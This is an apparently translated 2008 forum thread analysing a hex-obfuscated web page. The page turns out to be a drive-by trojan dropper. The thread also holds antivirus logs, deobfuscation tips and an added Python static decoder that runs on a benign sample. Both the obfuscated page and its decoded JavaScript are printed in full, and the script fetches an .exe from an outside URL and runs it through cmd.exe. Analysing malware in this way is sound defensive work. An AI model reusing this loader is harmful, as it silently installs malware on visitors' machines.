Views: 2301 | Replies: 7

[Identified] Anyone who can decode this page, please come

250662772
Posted 2008-12-2 16:46:48
I really can't decode this one. Does anyone know a way to decode it?


<html>
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
s="js"
flag_type=s
S="66756e6374696F6e20676e286e29200d0a7B200D0A766172206E756d626572203D204d6"
S=S+"174682E72616e646f6D28292A6E3B2072657475726e20277E746D70272b4D6174682E72"
S=S+"6f756E64286E756D626572292B272e657865273B200d0a7D200D0a6C6A3d22687474703"
S=S+"a2f2F7777772e376b66696c652e636E2F646e2f646E2e657865223b0D0A747279200D0a"
S=S+"7b206161613D226F223B0d0a6262623D22626A65223B0D0A7979793d226374223b0D0A6"
S=S+"363633d2241646F64223B0d0A6464643d22622e53747265616D223B0d0A6565653d224d"
S=S+"6963726F736F66742e584d4C485454222B2250223B0D0a6767673d226f223B0d0A6B6B6"
S=S+"B3D2270223b0D0a6d6d6D3d2265223B0D0A7373733D226e223B0d0A7661722064663d64"
S=S+"6F63756d656e742e637265617465456c656D656e74286161612B6262622B797979293B2"
S=S+"00d0a64662E7365744174747269627574652822636c6173736964222C22636C7369643A"
S=S+"42443936433535362d363541332d313144302D393833412d30304330344643323945333"
S=S+"622293B200d0a76617220783d64662E4372656174654F626a656374286565652C222229"
S=S+"3B200D0A76617220533d64662e4372656174654F626A656374286363632b6464642C222"
S=S+"2293B200d0A532E747970653D313b200D0a782e6F70656e2822474554222C206c6a2C30"
S=S+"293B0d0A782E73656e6428293b200d0a6D7A313D676e283130303030293B200D0a76617"
S=S+"220463d64662E4372656174654F626A6563742822536372697074696E672e46696C6553"
S=S+"797374656d4F626A656374222c2222293B200d0a76617220746D703D462E47657453706"
S=S+"56369616C466f6C6465722830293B206D7A313d20462e4275696C645061746828746d70"
S=S+"2C6D7a31293b200D0A532E4F70656E28293B0d0a7474743d782e726573706F6e7365426"
S=S+"F64793B0D0a532E577269746528747474293B200d0a693D323B0D0a532E53617665546F"
S=S+"46696c65286d7A312C69293b20532e436C6F736528293b200D0A76617220513d64662e4"
S=S+"372656174654f626a65637428225368656c6C2E4170706c69636174696f6E222c222229"
S=S+"3b200D0a657870313D462e4275696c645061746828746D702B275C5c737973272b27746"
S=S+"56d3332272c27636d642E65786527293B200d0a515b225368656C6c45222B2278656375"
S=S+"7465225d28657870312C27202f6320272B6d7A312c22222C6767672B6B6b6B2b6d6d6d2"
S=S+"b7373732C30293b200d0a7d206361746368286929207b20693D313b207D200d0a"
D=""
DO WHILE LEN(S)>1
    k="&H"
    k=k+ucase(LEFT(S,2))
    p=CLng(k)
    m=chr(p)
    D=D&m
    S=mymid(S)
LOOP
if flag_type="html" then
  document.write(D)
end if
if flag_type="vbs" then
  EXECUTE D
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
var e;
try
{
eval(D);
}
catch(e){}
}
</script>
</body>
</html>
glacier_lk
Posted 2008-12-2 16:59:26
Just paste it into my decoder page and click "consecutive hex decode 1" to get the decoded code...
Decoder page (beta): http://glacierlk.cn/openlab/jm.htm
function gn(n)
{
var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
}
lj="http://www.7kfile.cn/dn/dn.exe";
try
{ aaa="o";
bbb="bje";
yyy="ct";
ccc="Adod";
ddd="b.Stream";
eee="Microsoft.XMLHTT"+"P";
ggg="o";
kkk="p";
mmm="e";
sss="n";
var df=document.createElement(aaa+bbb+yyy);
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
x.open("GET", lj,0);
x.send();
mz1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
S.Open();
ttt=x.responseBody;
S.Write(ttt);
i=2;
S.SaveToFile(mz1,i); S.Close();
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe');
Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
} catch(i) { i=1; }
shmily512099
Posted 2008-12-2 17:04:31
shmily512099
Posted 2008-12-2 17:06:30
木马名称:Trojan-Downloader.Win32.Delf.pft

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\CH2R81EF\DN[1].EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?
Palkia
Posted 2008-12-2 18:20:05

to kl

2008-12-2 18:20:04        检测到威胁: HEUR:Trojan.Win32.Invader        C:\Documents and Settings\Administrator\桌面\dn.exe
qianwenxiang
Posted 2008-12-2 18:22:45
雨宫优子
Posted 2008-12-2 18:25:13
It's actually quite simple.

This is really just HexAscii encryption.

Someone on the forum has posted a decoding tool...

It's also easy without a decoding tool:

Replace eval(D); with document.write("<xmp>"+D+"</xmp>")

Run it in a sandbox and you get the code.

Even simpler is to replace eval with alert...
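glacier_lk's decoder page and 雨宫优子's trick of dumping D instead of evaluating it come down to the same static step: rebuild the hex string the VBScript assembles from the S="..." and S=S+"..." lines, decode it two digits at a time, and read the result without ever running it. The script below is an added example, not the forum's decoder nor anything from the original post. It reproduces the DO WHILE loop offline in Python, folds the split string literals ("Microsoft.XMLHTT"+"P" style) back together, and lists the URLs, COM ProgIDs and CLSIDs an analyst would triage first. The page it decodes is a constructed, benign sample in the same loader shape as the posted one; the function names and the ProgID watch list are my own choices.

```python
import re

# Constructed, benign sample in the same shape as the posted loader: the hex
# string is split across S="..." / S=S+"..." lines (even mid-byte, mixed
# case), decoded two hex digits at a time into D, and handed to eval(D).
SAMPLE_PAGE = '''<script language="VBScript">
s="js"
S="76617220753d22687474703a2f2f6578616d706c652e6"
S=S+"e65742f74657374223b0D0A766172206f3d2241646f22"
S=S+"2b2264622e53747265616D223b"
D=""
DO WHILE LEN(S)>1
    k="&H"
    k=k+ucase(LEFT(S,2))
    p=CLng(k)
    m=chr(p)
    D=D&m
    S=mymid(S)
LOOP
</script>
<script language="JavaScript">eval(D);</script>'''

# One assignment line: optional "S+" marks an append, otherwise a reset.
# VBScript identifiers are case-insensitive, hence re.I; only literals made
# purely of hex digits are collected, so s="js" is ignored as in the original.
HEX_SEG = re.compile(r'^\s*S\s*=\s*(S\s*\+\s*)?"([0-9A-Fa-f]*)"\s*$', re.M | re.I)
DQ = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
SQ = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
CLSID_RE = re.compile(r'clsid:[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}', re.I)
# Watch list of ProgIDs commonly seen in download-and-run scripts (my choice).
PROGIDS = ["Adodb.Stream", "Microsoft.XMLHTTP", "Scripting.FileSystemObject",
           "Shell.Application", "WScript.Shell"]


def extract_hex_payload(page: str) -> str:
    """Replay the S= / S=S+ assignments in order and return the final hex string."""
    buf = ""
    for is_append, hexpart in HEX_SEG.findall(page):
        buf = buf + hexpart if is_append else hexpart
    return buf


def hex_to_text(hexstr: str) -> str:
    """Mirror the loop: LEFT(S,2) -> &H.. -> chr, stopping when fewer than 2 chars remain."""
    if len(hexstr) % 2:          # LEN(S)>1 drops a dangling odd nibble
        hexstr = hexstr[:-1]
    # chr() on bytes >127 depends on the victim's code page; latin-1 keeps the
    # raw byte value, which is an approximation labelled as such.
    return bytes.fromhex(hexstr).decode("latin-1")


def decode_page(page: str) -> str:
    return hex_to_text(extract_hex_payload(page))


def fold_literals(src: str) -> str:
    """Join adjacent quoted literals ("a"+"b" -> "ab") until nothing changes.
    Heuristic: it does not understand escapes or variable-based splitting."""
    prev = None
    while prev != src:
        prev = src
        src = DQ.sub(r'"\1\2"', src)
        src = SQ.sub(r"'\1\2'", src)
    return src


def analyse(page: str) -> dict:
    """Decode without executing and pull out the indicators to triage first."""
    decoded = decode_page(page)
    folded = fold_literals(decoded)
    return {
        "decoded": decoded,
        "folded": folded,
        "urls": URL_RE.findall(folded),
        "progids": [p for p in PROGIDS if p.lower() in folded.lower()],
        "clsids": CLSID_RE.findall(folded),
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_PAGE)
    print(report["folded"])
    print("URLs:", report["urls"])
    print("ProgIDs:", report["progids"])
    print("CLSIDs:", report["clsids"])
```

Fed the real page from the first post instead of SAMPLE_PAGE, the same functions produce the plaintext glacier_lk posted, with the "Adod"+"b.Stream" and "Microsoft.XMLHTT"+"P" splits folded; the aaa+bbb+yyy style of splitting through variables is deliberately left alone, since resolving it means interpreting the script rather than decoding it.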
leonfg
Posted 2008-12-2 23:42:13
2008-12-02 23:41:46        HTTP filter        file        http://www.7kfile.cn/dn/dn.exe        probably a variant of Win32/TrojanDownloader.Delf.NJH trojan        connection terminated - quarantined        CHINESE-GUNDAM\GUNDAM        Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.